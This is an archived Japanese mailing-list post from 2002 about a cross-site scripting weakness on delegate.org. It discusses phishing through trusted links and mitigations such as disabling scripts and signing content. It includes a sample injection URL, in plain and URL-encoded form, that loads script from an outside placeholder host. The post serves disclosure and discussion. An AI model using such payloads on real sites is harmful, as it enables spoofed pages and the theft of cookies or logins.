Article delegate-en/1784 of [1-5169] on the server localhost:119
  upper oldest olders older1 this newer1 newers latest
search
[Top/Up] [oldest] - [Older+chunk] - [Newer+chunk] - [newest + Check]
[Reference:<_A1783@delegate-en.ML_>]
Newsgroups: mail-lists.delegate-en

[DeleGate-En] Re: Delegate.org のクロスサイトスクリプティング脆弱性
25 Jul 2002 07:21:18 GMT office <p6edabdyi-p5lznxprgjxr.ml@ml.delegate.org>


officeです

On Thu, 25 Jul 2002 13:38:49 +0900 (JST)
feedback@delegate.org (Yutaka Sato) wrote:

>  |このようなことも可能です。偽の delegate ダウンロード用ページを作ることも
>  |可能です。偽 delegate の Hash値 なども表示可能です。
> 
> 誤解してるかも知れません。怪しげなサイトから張られた重要なサイトへのリン
> クを信用するユーザがいるという、ことでしょうか。

仮に「怪しげなサイト」であったとしでも、そこから通常の文脈で示されたリンク
まで疑う人はいないでしょう。

佐藤さんのお話の中で、

> <URL:http://www.cert.org/advisories/CA-2000-02.html>

が出てきてますが、これを信じるに足るリンクだと判断する理由は、佐藤さんと
今までセキュリティの話をしていて、cert.org というセキュリティで有名なサ
イトドメインのリンクを指し示しているという文脈からに過ぎません。

このリンクが実は悪意あるリンクかどうかなんて、アクセス前からわかるわけは
ないし、アクセスした後にも、それが文脈に沿った内容であれば、通常なら疑う
必然性はありません。

delegate などの proxy の勉強をしたいと思い始めた新米プログラマが、
「今なら面白い開発版が
http://www.delegate.org/<script+src=http://hoge></script>
(あるいは、さらにこれをURLエンコードした
http://www.delegate.org/%3C%73%63%72%69%70%74%2B%73%72%63%3D%68%74%74%70%3A%2F%2F%68%6F%67%65%3E%3C%2F%73%63%72%69%70%74%3E
)
からダウンロードできるよと言われた場合、(実際にはこれらのURLは無効ですが)
そのアクセス先が、まさに delegate のダウンロードページの体裁が整って
おれば、www.delegate.orgを信ずるからこそ、疑いなど持ちようもないのが自然
です。そして、偽 delegate を別サイトからダウンロードさせられたとしても、
恐らく気づかないでしょう。

あるいは実例で言えば2chでe-bankの申し込みリンクのバナーが貼られた時にも、
それが本物のe-bankへの申し込みページか本気で疑った人は少数派のようでした。

> いずれにしろ、クロスサイトスクリプティングへの恐れは、やはりそれがユーザ
> に何も気付かれずに自動的に実行されてしまったり、Cookieが洩れてしまったり
> することでしょう。それに対応するにははまず、スクリプト言語の処理系を無効
> にすることが、まずは第一だと思います。

これには同意します。

> <URL:http://www.cert.org/advisories/CA-2000-02.html>
> 
>  |> 第三に、スクリプトを署名付きにして現在アクセス中のサーバ起源であるもの
>  |>     以外は実行しないようにする(という仕様にして実装を普及させる)
>  |> というようなところかと思います。
>  |
>  |仰ってることがよくわかりません。署名はどのように発行されるのでしょうか?
>  |HTMLコンテンツ中にその署名がある、あるいはHTMLコンテンツからその署名が
>  |呼び出されるというのなら、無意味に思えますが。
> 
> 署名は人間がするのが普通だと思いますが、スタティックなコンテンツに
> 対してはサーバがしても良いと思います。PGPでやっているみたいにクリア
> 署名でやるのが自然かと思います。
> サーバの公開鍵の配り方は色々あると思います。まあ一番素朴には /robots.txt
> みたいに配ることでしょうか。

なるほど理解しました。
--
office

  admin search upper oldest olders older1 this newer1 newers latest
[Top/Up] [oldest] - [Older+chunk] - [Newer+chunk] - [newest + Check]
@_@V